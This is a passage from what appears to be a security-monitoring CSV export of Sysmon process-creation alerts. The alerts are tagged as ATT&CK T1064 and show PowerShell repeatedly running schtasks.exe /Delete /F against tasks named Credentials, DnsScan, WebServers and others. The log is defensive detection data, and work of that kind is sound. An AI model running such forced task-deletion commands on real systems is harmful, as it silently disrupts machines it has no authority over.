+ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN werclpsyport /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:05.100026500Z"",""eventRecordID"":""2521"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:05.097\r\nProcessGuid: {df9fc3d3-b37d-5ecf-0000-001003bf1e00}\r\nProcessId: 6636\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN werclpsyport /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:50:05.097"",""processGuid"":""{df9fc3d3-b37d-5ecf-0000-001003bf1e00}"",""processId"":""6636"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN werclpsyport /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:33.353",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:05.067 +ProcessGuid: {df9fc3d3-b37d-5ecf-0000-00105fbd1e00} +ProcessId: 6308 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN TablteInputout /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 
+IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN TablteInputout /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:05.070137800Z"",""eventRecordID"":""2520"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:05.067\r\nProcessGuid: {df9fc3d3-b37d-5ecf-0000-00105fbd1e00}\r\nProcessId: 6308\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN TablteInputout /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 
6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:05.067"",""processGuid"":""{df9fc3d3-b37d-5ecf-0000-00105fbd1e00}"",""processId"":""6308"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN TablteInputout /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:33.322",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:05.040 +ProcessGuid: {df9fc3d3-b37d-5ecf-0000-0010d1bb1e00} +ProcessId: 3960 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe 
+CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Credentials /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Credentials /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:05.043630700Z"",""eventRecordID"":""2519"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:05.040\r\nProcessGuid: {df9fc3d3-b37d-5ecf-0000-0010d1bb1e00}\r\nProcessId: 3960\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Credentials /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 
1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:05.040"",""processGuid"":""{df9fc3d3-b37d-5ecf-0000-0010d1bb1e00}"",""processId"":""3960"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Credentials /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:33.289",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:05.018 +ProcessGuid: {df9fc3d3-b37d-5ecf-0000-001028ba1e00} +ProcessId: 
2328 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WebServers /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WebServers /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:05.020412600Z"",""eventRecordID"":""2518"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:05.018\r\nProcessGuid: {df9fc3d3-b37d-5ecf-0000-001028ba1e00}\r\nProcessId: 2328\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: 
\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WebServers /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:05.018"",""processGuid"":""{df9fc3d3-b37d-5ecf-0000-001028ba1e00}"",""processId"":""2328"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WebServers /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" 
-Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:33.244",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.984 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-00103cb81e00} +ProcessId: 2344 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DnsScan /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsScan /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.989863500Z"",""eventRecordID"":""2517"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.984\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-00103cb81e00}\r\nProcessId: 2344\r\nImage: 
C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsScan /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.984"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-00103cb81e00}"",""processId"":""2344"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DnsScan /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:33.239",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.944 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-00105cb61e00} +ProcessId: 1720 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Ddrivers /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Ddrivers 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.946193900Z"",""eventRecordID"":""2516"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.944\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-00105cb61e00}\r\nProcessId: 1720\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Ddrivers /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.944"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-00105cb61e00}"",""processId"":""1720"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Ddrivers /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:33.212",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.913 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-0010b7b41e00} +ProcessId: 2356 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Bluetooths /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 
